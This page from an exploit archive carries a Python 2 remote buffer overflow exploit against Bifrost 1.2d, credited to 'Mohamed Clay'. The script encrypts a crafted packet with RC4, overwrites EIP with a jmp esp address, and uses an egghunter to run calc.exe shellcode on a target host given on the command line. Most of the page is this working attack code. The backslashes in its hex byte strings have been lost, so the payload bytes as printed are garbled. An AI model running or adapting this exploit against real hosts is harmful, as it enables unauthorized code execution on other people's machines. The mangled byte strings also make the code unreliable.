[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Bifrost 1.2d - Remote Buffer Overflow
# Published : 2013-06-30
# Author :
# Previous Title : Bifrost 1.2.1 - Remote Buffer OverFlow
# Next Title : Seowonintech Devices - Remote root Exploit


#!/usr/bin/python2.7
#By : Mohamed Clay
import socket
from time import sleep
from itertools import izip, cycle
import base64
import threading
import sys

def rc4crypt(data, key):
    x = 0
    box = range(256)
    for i in range(256):
        x = (x + box[i] + ord(key[i % len(key)])) % 256
        box[i], box[x] = box[x], box[i]
    x = 0
    y = 0
    out = []
    for char in data:
        x = (x + 1) % 256
        y = (y + box[x]) % 256
        box[x], box[y] = box[y], box[x]
        out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
    
    return ''.join(out)

def bif_len(s):
    while len(s)<8:
         s=s+"00"
    return s

def header(s):
      a=(s[0]+s[1]).decode("hex")
      a+=(s[2]+s[3]).decode("hex")
      a+=(s[4]+s[5]).decode("hex")
      a+=(s[5]+s[6]).decode("hex")
      return a

def random():     
    a="" 
    for i in range(0,8):
        a+="A"*1000+"|"
    return a


def exploit():
    s.sendall(out)

def usage():

   print "nnt***************************"
   print "t*    By : Mohamed Clay    *"
   print "t*  Bifrost 1.2d Exploit  *"
   print "t***************************n"
   print "t  Usage : ./bifrost1.2.1 host port"
   print "tExample : ./bifrost1.2.1 192.168.1.10 81nn"


if len(sys.argv)!=3:
    usage()
    exit()

HOST=sys.argv[1]
PORT=int(sys.argv[2])

key="xA3x78x26x35x57x32x2Dx60xB4x3Cx2Ax5Ex33x34x72x00"

xor="xB2x9Cx51xBB" # we need this in order to bypass 0046A03E function
eip="x53x93x3Ax7E" # jmp esp User32.dll

egghunter = "x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8x77x30x30x74x8BxFAxAFx75xEAxAFx75xE7xFFxE7";

#calc.exe shellcode (badchars "x00")

buf ="xb8x75xd3x5cx87xd9xeexd9x74x24xf4x5bx31xc9" 
buf +="xb1x33x31x43x12x83xebxfcx03x36xddxbex72x44" 
buf +="x09xb7x7dxb4xcaxa8xf4x51xfbxfax63x12xaexca" 
buf +="xe0x76x43xa0xa5x62xd0xc4x61x85x51x62x54xa8" 
buf +="x62x42x58x66xa0xc4x24x74xf5x26x14xb7x08x26" 
buf +="x51xa5xe3x7ax0axa2x56x6bx3fxf6x6ax8axefx7d" 
buf +="xd2xf4x8ax41xa7x4ex94x91x18xc4xdex09x12x82" 
buf +="xfex28xf7xd0xc3x63x7cx22xb7x72x54x7ax38x45" 
buf +="x98xd1x07x6ax15x2bx4fx4cxc6x5exbbxafx7bx59" 
buf +="x78xd2xa7xecx9dx74x23x56x46x85xe0x01x0dx89" 
buf +="x4dx45x49x8dx50x8axe1xa9xd9x2dx26x38x99x09" 
buf +="xe2x61x79x33xb3xcfx2cx4cxa3xb7x91xe8xafx55" 
buf +="xc5x8bxedx33x18x19x88x7ax1ax21x93x2cx73x10" 
buf +="x18xa3x04xadxcbx80xfbxe7x56xa0x93xa1x02xf1" 
buf +="xf9x51xf9x35x04xd2x08xc5xf3xcax78xc0xb8x4c" 
buf +="x90xb8xd1x38x96x6fxd1x68xf5xeex41xf0xd4x95" 
buf +="xe1x93x28"


raw=(1000-533-len(egghunter))*"x90"
raw2=(1000-8-len(buf))*"x41"+"|"
command=30


tmp=hex(command).split("0x")[1]
data=tmp.decode("hex")+"F"*2+" "*511+xor+"C"*12+eip+"A"*8+egghunter+raw+"|"+" "*1000+"|"+"w00tw00t"+buf+raw2+random()
out=rc4crypt(data,key)
l=header(bif_len(str(hex(len(data))).split("0x")[1]))
out=l+out


data2="2192.168.1.1|Default|Mohamed Clay|Mohamed Clay|p1.2d||0|-1|0|0000|0|1|0|0|000000|C:|C:|C:|MA|00000000|BifrosT v1.2d|"
out2=rc4crypt(data2,key)
l=header(bif_len(str(hex(len(data2))).split("0x")[1]))
out2=l+out2

th = threading.Thread(name='exploit', target=exploit)
th.setDaemon(True)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.sendall(out2)
th.start()
s.recv(1024)
print "n[*] By : Mohamed Clay"
print "[*] Exploit completedn"